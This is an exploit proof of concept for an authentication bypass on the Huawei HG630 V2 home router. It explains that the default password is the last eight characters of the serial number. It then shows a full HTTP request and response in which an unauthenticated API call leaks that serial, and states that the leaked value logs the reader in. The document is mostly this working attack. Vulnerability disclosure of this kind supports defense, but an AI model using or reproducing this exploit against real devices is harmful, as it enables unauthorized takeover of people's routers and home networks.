# Title: Huawei HG630 2 Router - Authentication Bypass# Date: 2020-04-13# Author: Eslam Medhat# Vendor Homepage: www.huawei.com# Version: HG630 V2# HardwareVersion: VER.B# CVE: N/A#POC:
The default password of this router is the last 8 characters of the
device's serial number which exist in the back of the device.
An attacker can leak the serial number via the web app API like the
following:************************Request************************
GET /api/system/deviceinfo HTTP/1.1
Host:192.168.1.1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:65.0)
Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript,*/*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm
************************Response************************
HTTP/1.1200 OK
Cache-Control: no-cache, no-store,max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection:1; mode=block
Date: Fri,01 Jan 201009:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length:141while(1);/*{"DeviceName":"HG630
V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/
You can use that serial number to login to the router.#Reference:
https://www.youtube.com/watch?v=vOrIL7L_cVc
